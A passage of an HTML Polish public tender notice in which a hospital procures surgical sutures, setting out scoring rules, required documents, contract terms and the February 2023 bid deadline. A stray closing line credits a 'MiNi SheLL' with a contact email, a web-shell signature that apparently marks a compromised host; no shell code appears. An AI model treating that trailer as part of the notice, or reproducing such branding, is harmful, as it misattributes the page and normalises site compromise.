class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji jakościowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET 3 - SZWY SYNTETYCZNE, PLECIONE, WCHŁANIALNE -23 pozycjie asortymentowe </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141121-4 - Szwy chirurgiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>L.p.	Nazwa kryterium	Znaczenie kryterium (w %)<br/>1	Cena (C)	60,00<br/>2	Termin realizacji dostaw częściowych	20,00<br/>3	Termin rozpatrzenia reklamacji jakościowej	20,00<br/><br/><br/>1.1 Punkty w kryterium cena przyznawane będą proporcjonalnie, przy założeniu, że oferta z najniższą ceną uzyska 60 pkt, pozostałe zostaną wyliczone zgodnie ze wzorem Cn/Cb x 60,00 = C<br/>gdzie: Cn - najniższa cena spośród wszystkich ofert<br/> Cb - cena oferty badanej<br/> C - punkty przyznane za cenę oferty<br/><br/><br/>1.2. Punkty w kryterium termin dostaw częściowych – zostaną przyznane zgodnie z następującymi zasadami:<br/>za termin dostawy do 3 dni roboczych, licząc od dnia złożenia zamówienia – 20,00 pkt<br/>za termin dostawy do 4 dni roboczych,, licząc od dnia złożenia zamówienia – 15,00 pkt<br/>za termin dostawy do 5 dni roboczych,, licząc od dnia złożenia zamówienia – 10,00 pkt<br/>za termin dostawy do 6 dni roboczych,, licząc od dnia złożenia zamówienia – 5,00 pkt<br/>za termin dostawy do 7 dni roboczych,, licząc od dnia złożenia zamówienia – 0,00 pkt<br/><br/>W przypadku braku informacji w Formularzu Oferty o zaoferowanym terminie dostaw cząstkowych, Zamawiający przyjmie do obliczeń termin maksymalny, tj. 7 dni.<br/>Zaproponowanie terminu dostaw cząstkowych dłuższego niż maksymalny, spowoduje odrzucenie oferty, jako niezgodnej z wymaganiami Zamawiającego. <br/>W przypadku zaoferowania terminu dostaw cząstkowych krótszego niż minimalny, Zamawiający przyjmie do obliczeń termin 3 dni.<br/><br/>1.3. Punkty w kryterium termin rozpatrzenia reklamacji jakościowej - zostaną przyznane zgodnie <br/>z następującymi zasadami:<br/>za rozpatrzenie reklamacji jakościowej w terminie do 5 dni – 20,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 6 - 7 dni – 15,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 8 - 9 dni – 10,00 pkt <br/> za rozpatrzenie reklamacji jakościowej w terminie 10 - 12 dni – 5,00 pkt<br/> za rozpatrzenie reklamacji jakościowej w terminie 13 - 14 dni – 0,00 pkt<br/><br/>W przypadku braku informacji w Formularzu Oferty o zaoferowanym terminie rozpatrzenia reklamacji jakościowej, Zamawiający przyjmie do obliczeń termin maksymalny, tj. 14 dni.<br/>Zaproponowanie terminu rozpatrzenia reklamacji jakościowej dłuższego niż maksymalny, spowoduje odrzucenie oferty, jako niezgodnej z wymaganiami Zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostaw częściowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji jakościowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET 4 - SZWY SPECJALISTYCZNE - 7 pozycji asortymentowych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141121-4 - Szwy chirurgiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>L.p.	Nazwa kryterium	Znaczenie kryterium (w %)<br/>1	Cena (C)	60,00<br/>2	Termin realizacji dostaw częściowych	20,00<br/>3	Termin rozpatrzenia reklamacji jakościowej	20,00<br/><br/><br/>1.1 Punkty w kryterium cena przyznawane będą proporcjonalnie, przy założeniu, że oferta z najniższą ceną uzyska 60 pkt, pozostałe zostaną wyliczone zgodnie ze wzorem Cn/Cb x 60,00 = C<br/>gdzie: Cn - najniższa cena spośród wszystkich ofert<br/> Cb - cena oferty badanej<br/> C - punkty przyznane za cenę oferty<br/><br/><br/>1.2. Punkty w kryterium termin dostaw częściowych – zostaną przyznane zgodnie z następującymi zasadami:<br/>za termin dostawy do 3 dni roboczych, licząc od dnia złożenia zamówienia – 20,00 pkt<br/>za termin dostawy do 4 dni roboczych,, licząc od dnia złożenia zamówienia – 15,00 pkt<br/>za termin dostawy do 5 dni roboczych,, licząc od dnia złożenia zamówienia – 10,00 pkt<br/>za termin dostawy do 6 dni roboczych,, licząc od dnia złożenia zamówienia – 5,00 pkt<br/>za termin dostawy do 7 dni roboczych,, licząc od dnia złożenia zamówienia – 0,00 pkt<br/><br/>W przypadku braku informacji w Formularzu Oferty o zaoferowanym terminie dostaw cząstkowych, Zamawiający przyjmie do obliczeń termin maksymalny, tj. 7 dni.<br/>Zaproponowanie terminu dostaw cząstkowych dłuższego niż maksymalny, spowoduje odrzucenie oferty, jako niezgodnej z wymaganiami Zamawiającego. <br/>W przypadku zaoferowania terminu dostaw cząstkowych krótszego niż minimalny, Zamawiający przyjmie do obliczeń termin 3 dni.<br/><br/>1.3. Punkty w kryterium termin rozpatrzenia reklamacji jakościowej - zostaną przyznane zgodnie <br/>z następującymi zasadami:<br/>za rozpatrzenie reklamacji jakościowej w terminie do 5 dni – 20,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 6 - 7 dni – 15,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 8 - 9 dni – 10,00 pkt <br/> za rozpatrzenie reklamacji jakościowej w terminie 10 - 12 dni – 5,00 pkt<br/> za rozpatrzenie reklamacji jakościowej w terminie 13 - 14 dni – 0,00 pkt<br/><br/>W przypadku braku informacji w Formularzu Oferty o zaoferowanym terminie rozpatrzenia reklamacji jakościowej, Zamawiający przyjmie do obliczeń termin maksymalny, tj. 14 dni.<br/>Zaproponowanie terminu rozpatrzenia reklamacji jakościowej dłuższego niż maksymalny, spowoduje odrzucenie oferty, jako niezgodnej z wymaganiami Zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostaw częściowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji jakościowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET 5 - SZWY SPECJALISTYCZNE - 3 pozycje asortymentowe </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141121-4 - Szwy chirurgiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>L.p.	Nazwa kryterium	Znaczenie kryterium (w %)<br/>1	Cena (C)	60,00<br/>2	Termin realizacji dostaw częściowych	20,00<br/>3	Termin rozpatrzenia reklamacji jakościowej	20,00<br/><br/><br/>1.1 Punkty w kryterium cena przyznawane będą proporcjonalnie, przy założeniu, że oferta z najniższą ceną uzyska 60 pkt, pozostałe zostaną wyliczone zgodnie ze wzorem Cn/Cb x 60,00 = C<br/>gdzie: Cn - najniższa cena spośród wszystkich ofert<br/> Cb - cena oferty badanej<br/> C - punkty przyznane za cenę oferty<br/><br/><br/>1.2. Punkty w kryterium termin dostaw częściowych – zostaną przyznane zgodnie z następującymi zasadami:<br/>za termin dostawy do 3 dni roboczych, licząc od dnia złożenia zamówienia – 20,00 pkt<br/>za termin dostawy do 4 dni roboczych,, licząc od dnia złożenia zamówienia – 15,00 pkt<br/>za termin dostawy do 5 dni roboczych,, licząc od dnia złożenia zamówienia – 10,00 pkt<br/>za termin dostawy do 6 dni roboczych,, licząc od dnia złożenia zamówienia – 5,00 pkt<br/>za termin dostawy do 7 dni roboczych,, licząc od dnia złożenia zamówienia – 0,00 pkt<br/><br/>W przypadku braku informacji w Formularzu Oferty o zaoferowanym terminie dostaw cząstkowych, Zamawiający przyjmie do obliczeń termin maksymalny, tj. 7 dni.<br/>Zaproponowanie terminu dostaw cząstkowych dłuższego niż maksymalny, spowoduje odrzucenie oferty, jako niezgodnej z wymaganiami Zamawiającego. <br/>W przypadku zaoferowania terminu dostaw cząstkowych krótszego niż minimalny, Zamawiający przyjmie do obliczeń termin 3 dni.<br/><br/>1.3. Punkty w kryterium termin rozpatrzenia reklamacji jakościowej - zostaną przyznane zgodnie <br/>z następującymi zasadami:<br/>za rozpatrzenie reklamacji jakościowej w terminie do 5 dni – 20,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 6 - 7 dni – 15,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 8 - 9 dni – 10,00 pkt <br/> za rozpatrzenie reklamacji jakościowej w terminie 10 - 12 dni – 5,00 pkt<br/> za rozpatrzenie reklamacji jakościowej w terminie 13 - 14 dni – 0,00 pkt<br/><br/>W przypadku braku informacji w Formularzu Oferty o zaoferowanym terminie rozpatrzenia reklamacji jakościowej, Zamawiający przyjmie do obliczeń termin maksymalny, tj. 14 dni.<br/>Zaproponowanie terminu rozpatrzenia reklamacji jakościowej dłuższego niż maksymalny, spowoduje odrzucenie oferty, jako niezgodnej z wymaganiami Zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostaw częściowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji jakościowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET 6 - SZWY SPECJALISTYCZNE- 3 pozycje asortymentowe </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141121-4 - Szwy chirurgiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>L.p.	Nazwa kryterium	Znaczenie kryterium (w %)<br/>1	Cena (C)	60,00<br/>2	Termin realizacji dostaw częściowych	20,00<br/>3	Termin rozpatrzenia reklamacji jakościowej	20,00<br/><br/><br/>1.1 Punkty w kryterium cena przyznawane będą proporcjonalnie, przy założeniu, że oferta z najniższą ceną uzyska 60 pkt, pozostałe zostaną wyliczone zgodnie ze wzorem Cn/Cb x 60,00 = C<br/>gdzie: Cn - najniższa cena spośród wszystkich ofert<br/> Cb - cena oferty badanej<br/> C - punkty przyznane za cenę oferty<br/><br/><br/>1.2. Punkty w kryterium termin dostaw częściowych – zostaną przyznane zgodnie z następującymi zasadami:<br/>za termin dostawy do 3 dni roboczych, licząc od dnia złożenia zamówienia – 20,00 pkt<br/>za termin dostawy do 4 dni roboczych,, licząc od dnia złożenia zamówienia – 15,00 pkt<br/>za termin dostawy do 5 dni roboczych,, licząc od dnia złożenia zamówienia – 10,00 pkt<br/>za termin dostawy do 6 dni roboczych,, licząc od dnia złożenia zamówienia – 5,00 pkt<br/>za termin dostawy do 7 dni roboczych,, licząc od dnia złożenia zamówienia – 0,00 pkt<br/><br/>W przypadku braku informacji w Formularzu Oferty o zaoferowanym terminie dostaw cząstkowych, Zamawiający przyjmie do obliczeń termin maksymalny, tj. 7 dni.<br/>Zaproponowanie terminu dostaw cząstkowych dłuższego niż maksymalny, spowoduje odrzucenie oferty, jako niezgodnej z wymaganiami Zamawiającego. <br/>W przypadku zaoferowania terminu dostaw cząstkowych krótszego niż minimalny, Zamawiający przyjmie do obliczeń termin 3 dni.<br/><br/>1.3. Punkty w kryterium termin rozpatrzenia reklamacji jakościowej - zostaną przyznane zgodnie <br/>z następującymi zasadami:<br/>za rozpatrzenie reklamacji jakościowej w terminie do 5 dni – 20,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 6 - 7 dni – 15,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 8 - 9 dni – 10,00 pkt <br/> za rozpatrzenie reklamacji jakościowej w terminie 10 - 12 dni – 5,00 pkt<br/> za rozpatrzenie reklamacji jakościowej w terminie 13 - 14 dni – 0,00 pkt<br/><br/>W przypadku braku informacji w Formularzu Oferty o zaoferowanym terminie rozpatrzenia reklamacji jakościowej, Zamawiający przyjmie do obliczeń termin maksymalny, tj. 14 dni.<br/>Zaproponowanie terminu rozpatrzenia reklamacji jakościowej dłuższego niż maksymalny, spowoduje odrzucenie oferty, jako niezgodnej z wymaganiami Zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostaw częściowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji jakościowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Wraz z ofertą Wykonawca zobowiązany jest złożyć następujące, przedmiotowe środki dowodowe:<br/>a)	oświadczenie Wykonawcy, iż oferowany przedmiot zamówienia posiada dokumenty dopuszczające do obrotu na terytorium Polski lub UE, lub inne dopuszczenia, atesty i opinie wraz ze zobowiązaniem, iż dokumenty te zostaną udostępnione Zamawiającemu na każde jego wezwanie;<br/>b)	prospekty, ulotki, karty katalogowe, opisy oferowanych produktów w języku polskim dla każdego zaoferowanego asortymentu zawierające opis przedmiotu zamówienia, nazwę handlową, producenta oraz nr katalogowy. Prospekty, ulotki, karty katalogowe lub opisy muszą zawierać co najmniej dane na temat wymaganych parametrów technicznych określonych w opisie przedmiotu zamówienia – z zaznaczeniem numeru pakietu i pozycji, której dotyczą. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1.	Wraz z ofertą Wykonawca zobowiązany jest złożyć następujące, przedmiotowe środki dowodowe:<br/>a)	oświadczenie Wykonawcy, iż oferowany przedmiot zamówienia posiada dokumenty dopuszczające do obrotu na terytorium Polski lub UE, lub inne dopuszczenia, atesty i opinie wraz ze zobowiązaniem, iż dokumenty te zostaną udostępnione Zamawiającemu na każde jego wezwanie;<br/>b)	prospekty, ulotki, karty katalogowe, opisy oferowanych produktów w języku polskim dla każdego zaoferowanego asortymentu zawierające opis przedmiotu zamówienia, nazwę handlową, producenta oraz nr katalogowy. Prospekty, ulotki, karty katalogowe lub opisy muszą zawierać co najmniej dane na temat wymaganych parametrów technicznych określonych w opisie przedmiotu zamówienia – z zaznaczeniem numeru pakietu i pozycji, której dotyczą. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Uzupełniony formularz ofertowy – zgodnie z Załącznikiem Nr 1 do SWZ.<br/>2.	Uzupełniony formularz asortymentowo – cenowy - zgodnie z Załącznikiem Nr 2 do SWZ.<br/>3.	Oświadczenie podmiotu udostępniającego zasoby - Załącznik nr 4 do SWZ ( jeżeli dotyczy).<br/>4.	Zobowiązanie podmiotu udostępniającego zasoby - Załącznik nr 5 do SWZ( jeżeli dotyczy).<br/>5.	Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia – Załącznik Nr 6 do SWZ ( jeżeli dotyczy).<br/>6.	Pełnomocnictwo upoważniające do złożenia oferty, jeżeli ofertę składa pełnomocnik.<br/>7.	Pełnomocnictwo do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. ( jeżeli dotyczy).<br/>8.	Klauzula informacyjna Szpitala z potwierdzeniem przyjęcia do wiadomości jej treści – Załącznik <br/>Nr 8 do SWZ. <br/><br/>9.	Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (t.j. w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym).<br/>10.	Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio <br/>w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 §2 ustawy z dnia 14 lutego 1991 r. Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym <br/>lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają Pełnomocnika (Lidera) do reprezentowania ich w niniejszym postępowaniu albo do <br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelka <br/>korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem (Liderem).<br/>2.	Treść pełnomocnictwa powinna dokładnie określać zakres umocowania i wymieniać wszystkich <br/>Wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia. Pełnomocnictwo w postaci <br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub <br/>podpisem osobistym należy złożyć wraz z ofertą.<br/>3.	Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia.<br/>Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 2.	Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w sprawie zamówienia publicznego, na podstawie art. 454 - 455 ustawy Pzp, oraz na warunkach określonych we wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-13 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">http://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-13 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-14</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com